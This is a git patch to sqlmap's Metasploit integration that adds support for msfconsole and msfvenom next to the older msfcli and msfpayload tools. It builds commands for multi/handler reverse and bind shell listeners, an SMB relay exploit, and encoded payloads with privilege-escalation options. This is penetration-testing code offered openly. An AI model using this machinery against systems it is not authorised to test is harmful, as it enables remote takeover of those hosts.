From a905b8d8f55d5e1478912993235685d0ca5d174a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 23 Jul 2015 10:07:21 +0200 Subject: [PATCH] Fixes #1312 --- lib/core/option.py | 12 ++--- lib/takeover/metasploit.py | 104 +++++++++++++++++++++++++------------ 2 files changed, 76 insertions(+), 40 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 75885f878..b73152469 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -765,12 +765,12 @@ def _setMetasploit(): if conf.msfPath: for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")): - if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole")): + if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)): - kb.msfVenom = True + kb.oldMsf = False elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")): - kb.msfVenom = False + kb.oldMsf = True else: msfEnvPathExists = False conf.msfPath = path @@ -806,9 +806,9 @@ def _setMetasploit(): if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")): msfEnvPathExists = True if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)): - kb.msfVenom = True + kb.oldMsf = False elif all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfencode", "msfpayload")): - kb.msfVenom = False + kb.oldMsf = True else: msfEnvPathExists = False @@ -1811,10 +1811,10 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.matchRatio = None kb.maxConnectionsFlag = False kb.mergeCookies = None - kb.msfVenom = False kb.multiThreadMode = False kb.negativeLogic = False kb.nullConnection = None + kb.oldMsf = None kb.orderByColumns = None kb.originalCode = None kb.originalPage = None diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 14364c77d..8717b6c73 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -62,6 +62,7 @@ class Metasploit: self.localIP = getLocalIP() self.remoteIP = getRemoteIP() or conf.hostname self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) + self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole")) self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom")) @@ -78,6 +79,7 @@ class Metasploit: if _ == old: break self._msfCli = "%s & ruby %s" % (_, self._msfCli) + self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) self._msfEncode = "ruby %s" % self._msfEncode self._msfPayload = "%s & ruby %s" % (_, self._msfPayload) self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) @@ -329,45 +331,79 @@ class Metasploit: self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) def _forgeMsfCliCmd(self, exitfunc="process"): - self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=%s" % exitfunc - self._cliCmd += " LPORT=%s" % self.portStr + if kb.oldMsf: + self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=%s" % exitfunc + self._cliCmd += " LPORT=%s" % self.portStr - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") + + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += " DisableCourtesyShell=true" + + self._cliCmd += " E" else: - raise SqlmapDataException("unexpected connection type") + self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC %s" % exitfunc + self._cliCmd += "; set LPORT %s" % self.portStr - if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": - self._cliCmd += " DisableCourtesyShell=true" + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - self._cliCmd += " E" + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += "; set DisableCourtesyShell true" + + self._cliCmd += "; exploit'" def _forgeMsfCliCmdForSmbrelay(self): self._prepareIngredients(encode=False) - self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=thread" - self._cliCmd += " LPORT=%s" % self.portStr - self._cliCmd += " SRVHOST=%s" % self.lhostStr - self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() + if kb.oldMsf: + self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=thread" + self._cliCmd += " LPORT=%s" % self.portStr + self._cliCmd += " SRVHOST=%s" % self.lhostStr + self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") + + self._cliCmd += " E" else: - raise SqlmapDataException("unexpected connection type") + self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC thread" + self._cliCmd += "; set LPORT %s" % self.portStr + self._cliCmd += "; set SRVHOST %s" % self.lhostStr + self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort() - self._cliCmd += " E" + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") + + self._cliCmd += "; exploit'" def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): - if kb.msfVenom: - self._payloadCmd = "%s -p" % self._msfVenom - else: + if kb.oldMsf: self._payloadCmd = self._msfPayload + else: + self._payloadCmd = "%s -p" % self._msfVenom + self._payloadCmd += " %s" % self.payloadConnStr self._payloadCmd += " EXITFUNC=%s" % exitfunc self._payloadCmd += " LPORT=%s" % self.portStr @@ -380,15 +416,7 @@ class Metasploit: if Backend.isOs(OS.LINUX) and conf.privEsc: self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true" - if kb.msfVenom: - if extra == "BufferRegister=EAX": - self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile) - - if extra is not None: - self._payloadCmd += " %s" % extra - else: - self._payloadCmd += " -f exe > \"%s\"" % outFile - else: + if kb.oldMsf: if extra == "BufferRegister=EAX": self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) @@ -396,6 +424,14 @@ class Metasploit: self._payloadCmd += " %s" % extra else: self._payloadCmd += " X > \"%s\"" % outFile + else: + if extra == "BufferRegister=EAX": + self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile) + + if extra is not None: + self._payloadCmd += " %s" % extra + else: + self._payloadCmd += " -f exe > \"%s\"" % outFile def _runMsfCliSmbrelay(self): self._forgeMsfCliCmdForSmbrelay()